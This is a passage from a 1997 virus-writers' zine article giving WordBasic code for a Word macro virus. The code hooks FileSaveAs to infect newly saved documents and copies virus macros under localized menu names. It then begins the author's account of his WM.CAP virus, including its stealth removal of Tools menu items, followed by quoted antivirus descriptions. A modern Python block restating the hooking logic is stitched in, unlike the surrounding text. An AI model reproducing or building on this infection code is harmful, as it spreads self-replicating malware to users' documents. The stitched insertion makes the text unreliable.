        Dialog dlg                              ' No, a clean document, show box
        FileSaveAs dlg                          ' Save the new document
        Infect(dlg.Name)                        ' Infect it! go!
    Else                                        ' It's a template (i.e. it's infected)
        TempWindow = Window()                   ' Get current window (template)
        OriginalName$ = dlg.Name                ' Get original document name
        FileNew .Template = FileName$()         ' Create new doc based on template!
        On Error Goto CloseDoc                  ' Now on: if any error close new doc
        GetCurValues dlg                        ' Get current values for new doc
        dlg.Name = OriginalName$                ' Change doc name for original one
        Dialog dlg                              ' Ok, show FileSaveAs dialog box
        FileSaveAs dlg                          ' Save the new document
        On Error Goto endFileSaveAs             ' Now on: if any error just go
        Infect(dlg.Name)                        ' Ok, infect new document
        If TempWindow >= Window() Then          ' Get old template window number
            TempWindow = TempWindow + 1
        End If
        WindowList TempWindow                   ' Make it the active window
CloseDoc:
        FileClose 2                             ' Close it without promptin
    End If
endFileSaveAs:                                  ' We're done! "SaveAs" problem fixed!
End Sub
The trick here is that the "FileSaveAs" subroutine behaves
diferently acordin to the object bein saved. If the object is a
genuine Word document (i.e. not infected), the routine simply shows
the "SaveAs" dialog box and tries to infect it afterwardz. If the
object bein saved is a "template" (i.e. perhaps an infected
document) then the routine first creates a new document based on
that active template (which is actually the infected document
itself) and then shows the "SaveAs" dialog box from this newly
created clean document. This time Word allows to choose the format
type, drive letter and directory namez. After the user chooses the
document name and saves it, the routine simply infects the
document, swaps to the window containin the old template (i.e. the
old infected document) and finally closes it leavin open the new
"Saved-As" document just as Word itself does.
If at this point u're wonderin why we created a new "empty"
document from the template, then u probably need some background
info in Word macroz and templatez. The new created document is NOT
"empty" as it was created from a template which was not empty.
Remember that this template is really our infected document and as
a result our new created document will contain the same text stuff
as the template. Remember also the definition of what a "template"
is and why we use them.
3. The "MultiLanguage suport" problem This is a dificult topic
and several diferent aproachez have been tried and implemented by
different VXers in order to overcome it. However as to this writin,
i still havent seen a single *reliable* multilanguage macro virus.
The Wazzu virus consisted of a single automacro: AutoOpen. This
makes it language-independent indeed but it still has the "SaveAs"
problem, big deal. The "MultiLanguage suport" problem has to do
with the fact that MS Word is available in diferent languagez and
flavorz for diferent platformz. Whenever we give a macro the name
of a menu item, Word will actually execute the code contained in
such macro whenever the user clicks or presses the menu item
asociated with it. However if the user executes the same action
(clicks the same menu item) under another Word language, the
asociated macro won't be executed at all becoz it doesnt match the
menu item name as it was written in another language, u see? For
example supose in english Word we program the "FileOpen" macro to
do whatever action. Whenever we click the "File/Open" item, our
macro will be executed. However supose we copy (unchanged) the same
macro to another Word language, say spanish. Under this Word
language the asociated file menu item changes now to
"Archivo/Abrir". If we click this menu item, our old "FileOpen"
macro won't be executed at all. However if we rename the macro to
"ArchivoAbrir", this time it will execute just fine. This is what
is known as the "MultiLanguage suport" problem.
3.1. The "MultiLanguage suport" solution (without AutoMacroz)
The best aproach to obtain multilanguage suport without losin
control over the enviroment is interceptin the file menu related
macroz, at least the "FileSaveAs" macro so we can fix the "SaveAs"
problem. The best solution i came up with after thinkin a bit among
the diferent alternativez was to intercept the file macroz directly
acordin to the especific Word language instaled. This is not a
dificult task, however what proves to be somewhat complicated is
guessin out the correct macro name for the respective file menu
item. If this step is done incorrectly, some file menuz will end up
doin diferent actionz other than expected. For instance, the
"FileSave" macro could end up callin "FileClose", thus closin the
document instead of saving it or viceversa. In order to get the
macro namez for the actual Word language instaled, we must use the
"MenuItemMacro$" function. This function gives us the macro name
for a given menu item inside a menu, asumin we know of course which
menu this menu item refers or belongs to and knowin the menu item
name or the menu item position inside this menu itself. Heh are u
drowsy? =8-S. This is precisely the reason why this method is still
not 100% reliable. We must asume fixed menu item positionz for the
menu itemz we wanna hook. In any Word language from any standard
Word instalation we have the followin scenario (equivalent spanish
macroz are also shown):
            English      Spanish              Menu       Menu item position
            ----------   ------------------   --------   ------------------
            FileOpen     ArchivoAbrir         1 (File)   2
            FileClose    ArchivoCerrar        1 (File)   3
            FileSave     ArchivoGuardar       1 (File)   5
            FileSaveAs   ArchivoGuardarComo   1 (File)   6
This is precisely the method implemented in the WM.CAP virus in
order to work in any Word language. It created aditional macro
namez with same body but diferent name -acordin to the actual Word
language instaled- for a given macro function. The fact that the
macro code remains the same in any Word language is not a problem.
The macro interpreter inside Word is "universal", meanin that it
will execute correctly the WordBasic or VBA instructionz inside the
macroz without carin about the actual Word language instaled. It
needs however to refer to valid existin macro namez or labelz. As
macro namez change for a given especific Word language, we must be
very careful NOT to include any reference to a language-dependent
macro name inside any of our file related macroz. This is the
reason why such file related macroz inside WM.CAP are just short
stubz ("wraperz") that jump to other subroutinez inside the CAP
macro itself. Before showin an example to the "MultiLanguage
suport" method, i must warn once again that this method is not 100%
reliable. It all depends on how much the user has customized his
Word menuz and other setingz. It should however work just perfect
on those Wordz havin the factory standard setingz which gracely
share all Word instalationz by default. Again in some especific
user-customized Word instalationz, the latter method can easily
mess up some of the file related macroz, resultin in unexpected
behavior and weird funny actionz. Here follows the "MultiLanguage
suport" example.
3.2. The "MultiLanguage suport" example

Dim Shared MacroName$(N)                    ' Array of stringz to hold the macro namez

Sub MAIN                                    ' Main subroutine
    [...]
    MacroName$(2) = "FileOpen"              ' "FileOpen"   at position 2 in file menu
    MacroName$(3) = "FileClose"             ' "FileClose"  at position 3 in file menu
    MacroName$(5) = "FileSave"              ' "FileSave"   at position 5 in file menu
    MacroName$(6) = "FileSaveAs"            ' "FileSaveAs" at position 6 in file menu

    FileMenu$ = MenuText$(0, 1)             ' Get name for file menu ("&File")

    For MacroNumber = CountMacros(1) To 1 Step - 1      ' Process each macro
        Position = 0                        ' No position by now
        NameOfMacro$ = MacroName$(MacroNumber, 1)       ' Get macro name
        Select Case MacroDesc$(NameOfMacro$)            ' Get description of macro name
            Case "FileOpen"                 ' Description = "FileOpen" ? then
                Position = 2                '   position in file menu = 2
            Case "FileClose"                ' Description = "FileClose" ? then
                Position = 3                '   position in file menu = 3
            Case "FileSave"                 ' Description = "FileSave" ? then
                Position = 5                '   position in file menu = 5
            Case "FileSaveAs"               ' Description = "FileSaveAs" ? then
                Position = 6                '   position in file menu = 6
        End Select
        If Position Then                    ' If position in file menu was found then..
            LocalMacro$ = MenuItemMacro$(FileMenu$, 0, Position)  ' Get localized macro name
            If Left$(UCase$(LocalMacro$), Len(MacroName$(Position))) <> UCase$(MacroName$(Position)) \
               And Left$(LocalMacro$, 1) <> "(" Then
                ' local macro name is diferent from the english name and is NOT
                ' a separator "(.."; F$ holds the template name (set in the part elided above)
                MacroCopy F$ + ":" + NameOfMacro$, LocalMacro$, -1   ' Copy macro to localized macro name
            End If
        End If
    Next                                    ' Process next macro
    [...]
End Sub
The objective in the previous example shows for itself. We're
tryin to get the file related macro namez for any localized version
of Word other than english. If these file related macroz are
located in the exact position where we expect them to be in the
file menu (very likely), then the above example will do its work.
Probably at this point u're wonderin what has the macro description
field to do in all this mess. Heh, well, the field proves to be
very useful for some purposez other than simply describin what the
macro does. The macro description field can be used to hold
generation countz and self-recognition paternz, among other thingz.
In the above example however, the description field mite not be
necesary at all. Its purpose is simply to identify a given file
related macro in order to assign a position for it in the file
menu. But u could argue this can be done as well simply comparin
the macro name retrieved from the "MacroName$" function with the
required english macro name. Yes, u could, and it would work, as
long as these english file related macroz keep stayin in the
infected document. But u see, macro corruption, deletion and
snatchin of macros are common nowadayz between macro virii due to
the increasin number of existin samples of themselves. Becoz of
this, the use of the macro description field (whenever posible) to
recognize english or equivalent localized macro namez, makes the
virus much more robust to macro corruptionz or undesired macro
deletionz.
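The lookup from 3.1 and 3.2 restated in Python, with the customised-menu case the text warns about run next to the default case. This is an added example, not the page's WordBasic and not CAP's code: Word's MenuItemMacro$ is replaced by a dict, the Spanish menu is taken from the table in 3.1 (position 1 and the separator at position 4 are assumed; the "(" prefix is what the page's code tests for), and the customised menu, the "truth" table and the template's macro list are constructed for the demonstration.

```python
# English macro that a factory-default File menu carries at each position (section 3.1)
ENGLISH_AT_POSITION = {2: "FileOpen", 3: "FileClose", 5: "FileSave", 6: "FileSaveAs"}
POSITION_OF = {name: pos for pos, name in ENGLISH_AT_POSITION.items()}

# Constructed stand-in for MenuItemMacro$(FileMenu$, 0, pos) on a default Spanish Word 6
# (names from the table in 3.1; position 1 and the separator at 4 are assumed)
SPANISH_MENU = {1: "ArchivoNuevo", 2: "ArchivoAbrir", 3: "ArchivoCerrar",
                4: "(Separator)", 5: "ArchivoGuardar", 6: "ArchivoGuardarComo"}

# Constructed: the same menu after the user inserted a Print item above Save, which
# pushes the separator, Save and SaveAs down by one position
CUSTOMISED_MENU = {1: "ArchivoNuevo", 2: "ArchivoAbrir", 3: "ArchivoCerrar",
                   4: "ArchivoImprimir", 5: "(Separator)", 6: "ArchivoGuardar",
                   7: "ArchivoGuardarComo"}

# Constructed: what each localized name really does. The virus never has this table;
# it is here only to show where the fixed-position assumption goes wrong.
TRUTH = {"ArchivoAbrir": "FileOpen", "ArchivoCerrar": "FileClose",
         "ArchivoGuardar": "FileSave", "ArchivoGuardarComo": "FileSaveAt".replace("At", "As"),
         "ArchivoImprimir": "FilePrint"}

# Constructed: (name, description) of the macros in an infected template. The FileSave
# stub has been renamed, the case section 3.2 argues for: its description still says
# what it is, so it is found anyway.
TEMPLATE_MACROS = [("FileOpen", "FileOpen"), ("FileClose", "FileClose"),
                   ("XFileSave", "FileSave"), ("FileSaveAs", "FileSaveAs"),
                   ("CAP", ""), ("AutoOpen", "")]


def plan_copies(menu, macros):
    """Decide the MacroCopy calls the WordBasic loop would make.
    Returns [(source_macro, english_role, localized_name), ...]: each macro is identified
    by its description, the name bound at the matching menu position is fetched, and
    separators ("(...") or names that already start with the English name (the page's
    case-insensitive prefix test) are skipped."""
    copies = []
    for name, description in reversed(macros):         # For CountMacros(1) To 1 Step -1
        position = POSITION_OF.get(description)
        if position is None:                           # not a file-related macro
            continue
        local = menu.get(position)
        if local is None:                              # menu shorter than assumed
            continue
        english = ENGLISH_AT_POSITION[position]
        if local.upper().startswith(english.upper()) or local.startswith("("):
            continue
        copies.append((name, english, local))
    return copies


def misbindings(copies, truth):
    """Every planned copy whose target menu item does something other than the body
    being copied into it: (localized_name, body_it_gets, what_the_item_really_is)."""
    return [(local, english, truth.get(local))
            for _, english, local in copies if truth.get(local) != english]


if __name__ == "__main__":
    for label, menu in (("default", SPANISH_MENU), ("customised", CUSTOMISED_MENU)):
        copies = plan_copies(menu, TEMPLATE_MACROS)
        print(label, copies, "misbound:", misbindings(copies, TRUTH))
```

On the default menu every file macro lands on its Spanish twin, including the renamed FileSave stub, which is what the description field buys. On the customised menu the separator now sits at position 5, so FileSave is never hooked at all, and position 6 is "ArchivoGuardar", which receives the FileSaveAs body: the "FileSave could end up callin FileClose" failure from 3.1, in concrete form.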
4. Final note This article was written one or two months after
Microsoft released its long expected Office'97, containin Word'97.
Becoz of this and becoz i lost my interest in macro virii stuff
since that time on, i dunno if these macro trickz will also work
under Word'97, i guess not. However, if other VXerz are interested
in these topicz and want to add more robustness to their macro
virii under Word'97, they should consider the problemz described
above. I hope this article could be useful for that purpose. Thats
all, folkz.
5. Disclaimer This information is for educational purposez only.
The author is not responsible for any problemz caused by the use of
this information.
(c) 1997. Jacky Qwerty / 29A.
WM.CAP virus description > Jacky Qwerty/29A This article
gives a full description of the WordMacro CAP virus. It can be seen
as a "real" example for the different techniqz described in the
past article named "Macro virus trickz". Check out as well the
virus source code, also published in this isue.
Index

    1. Introduction
    1.1. Macro virus hype
    2. WM.CAP: a complex word macro virus?
    3. In the Newz
    3.1. Dr.Solomon speaks
    3.2. Sophos speaks
    3.3. McAfee speaks
    3.4. F-Potatoe speaks
    3.5. Norton speaks
    3.6. AVP speaks
    3.7. Quarterdeck speaks
    4. Functional Description
    4.1. Removal of macroz
    4.1.1. Concept vs. Wazzu
    4.1.2. CAP vs. Concept
    4.2. Global template infection
    4.2.1. Searchin for localized macroz
    4.2.2. Incremental generation count
    4.2.3. Removal of menu itemz - stealth
    4.3. Document, template and RTF infection
    4.4. Disablin of AutoMacroz
    4.5. The "SaveAs" problem solved
    5. Shortcutz
    6. Disclaimer
1. Introduction Factz prove for themselvez. Macro virii have
become one of the most comon type of computer virus. While the
latter sounds like a press release, we cant deny that unfortunately
it is becomin true. "Unfortunately" becoz as u will see later,
macro virii unlike other type of computer virii, are not really
very dificult to write, in fact much of them have been coded in a
very simple way, followin a straightforward programin aproach.
While there could be some few exceptionz to the rule, macro virii
in general dont prove to deserve that kind of atention that other
more interestin type of computer virii mite do, regardin other
innovative infection techniqz, new wayz of residency, improved
methodz for trapin file activity and the complexity of the virus
code itself. Featurez which are very dependent to a great extent on
the skillz of the VXer himself.
1.1. Macro virus hype But leavin aside that atonishin publicity
surroundin macro virii and now followin a much more objetive
aproach: what lies behind the creation of a macro virus? is it
really hard to write such virusez? why so much hype bout Concept?
well, not really. Much of that fuzz was nonsense, another press
release biten and exagerated by the obfuscating media. I remember
at the time Concept was big newz, AVerz started to say repeatedly
again and again
that such macro virii were fairly easy to write and that they
could be more infectious and comon than any other virus type. Yea
AVerz, strangely tho, said the mean and lean truth. So now they
come, shoot our mindz and then wash their handz pretendin they have
nothin to do with the macro virus hype. After all, we are the
"kidz" so we are the guilty onez, we are the bad guyz and they are
of course the heroez of the movie. Same old story.
2. WM.CAP: a complex macro virus? CAP was a macro virus i wrote
durin a bored December weekend after endin classes for the quarter
and startin my xmas vacationz. It was also my first and last macro
virus until i lost all of my interest in this stuff and focused my
atention on other much more interestin virus related topicz :) It
began as a curiosity of mine when tryin to understand for myself
how these virusez worked and how much they could spread for
themselvez. The CAP virus made its way into the wild the same way
most other virusez do. It was writen in a simple 386 machine runin
Windoze 3.1, it was tested in both english and spanish versionz of
Word 6, and was finaly released and spread as with any other macro
virus. Yea, it has some pretty kewl featurez but they are far from
bein extraordinary or complex as some AVerz put it, especialy an
AVer named Mikko Hyppönen from Datafellowz (F-Potatoe), a very nice
dude, author of F-Potatoe buletinz, who btw behaved very kind in
his last isue when he encouraged people to send their "opinion on
virus writin" to my Hotmail mailbox. I wont forget that one, Miko,
very nice from u, pal. However it was also the first time i thanked
the phuckin mother who hacked my Hotmail acount, hrmph
@&%#..
3. In the newz Shortly after CAP was released, there apeared a
seriez of increasin reportz posted on several newsgroupz,
especially from alt.comp.virus. Userz were suspectin about a new
macro virus removin the Toolz/Macro and Toolz/Customize menu itemz
from their Word enviroment. A couple of monthz later, CAP was bein
reported at diferent regionz worldwide. Was CAP just another lucky
virus or there was somethin more behind? Well, just keep readin if
u want to know the mean and lean truth. #8) But before this lets
listen to what AVerz have to say about CAP, that mite help us
understand some more about CAP's functionin, mmm.. well, just a bit
coz u know how some AVerz are, regardin their virus descriptionz.
They feed on hype describin how good their AV programz detect
virusez, instead of describin how the virusez really work and how
some of them are able to defeat and nulify their stuff. Most of the
AV programz agree they can safely remove all (removable) virusez
they detect. Factz prove this is not true. None of the macro AV
programz, except perhaps new versions of F-MacroW, have been able
to remove properly all of the CAP spontaneously generated variantz.
And as u'll see later in this article, this behavior could have
been made much more complex on purpose.
3.1. Dr.Solomon speaks (*) Dr.Solomon -
http://www.drsolomon.com/vircen/valerts/wmcap.html - - - - - - - -
- - - - - - - - - - - - - - - - - - - - - - - - - - - - ->8
WM/CAP This macro virus appeared first in February 1997 and has
quickly become widespread. The basic virus consists of one large
macro called CAP (hence the name) which is called from the virus'
other
macros - AutoExec, AutoOpen, FileSave, FileSaveAs,
FileTemplates, ToolsMacro, FileClose, FileOpen and AutoClose. When
the virus replicates, the first thing it does is to copy the basic
set of 10 macros. The virus then browses the WinWord menu items,
collects their names, (they could be different in different
language versions, or customized versions of WinWord), and
intercepts up to 5 of these additional macros - placing a pointer
to the main CAP macro inside them. If there are any system macros
defined in a global template before the infection - they are
deleted. The virus also removes the menu items Tools/Macro and
Tools/Customize. The File/Templates menu item is present after
infection but it does not work. In essence, then, the virus
consists of 10 basic English macros and up to 5 additional macros
taken from the menus if they are not standard for the English
language version of WinWord. The virus uses information from the
macro description field, (at the bottom of Tools/Macro box), for
self recognition of its core macros. These have "F%" at the
beginning of a description (FileOpen has F%O, FileClose - F%C,
FileSave - F%S and FileSaveAs - F%SA). The virus has no damaging
payload except that it removes system macros defined in the global
template. - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- - - - - - - ->8
3.2. Sophos speaks (*) Sophos -
http://www.sophos.com/virusinfo/analyses/winwordcap.html - - - - -
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
->8 Virus analyses Winword/CAP Virus Name:Winword/CAP. Aliases:
None known. Type: MS Word document infector. Resident: Yes, within
Word environment. Stealth: Yes. Empty macros are used to prevent
Word showing menu items. For example, the ToolsMacro (or
ExtrasMakro under German Word) is empty, which prevents the use of
the ToolsMacro to see whether or not there are macros present. The
virus also removes the menu item itself so that it does not even
appear in the list of available choices. Trigger: None. Payload:
None. Comments: The Winword/CAP virus installs the following
macros: FileTemplates, ToolsMacro, FileSaveAs, FileClose,
AutoClose, FileSave, FileOpen, AutoOpen, AutoExec and CAP. In
addition, the virus will find the current local language version of
the macros and will install these as well as the English ones. For
example, if the virus infects a German version of Word, it will
also install macros named DateiOffnen, DateiSpeichern,
DateiSpeichernUnter, DateiSchließenOderAllesSchließen. With the
exception of the CAP macro itself, all the macros are very short
stubs which either call subroutines within CAP or do nothing at
all. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- - - - - ->8
3.3. McAfee speaks (*) McAfee -
http://www.mcafee.com/support/techdocs/vinfo/vm007.asp - - - - - -
- - - - - - - - - - - - - -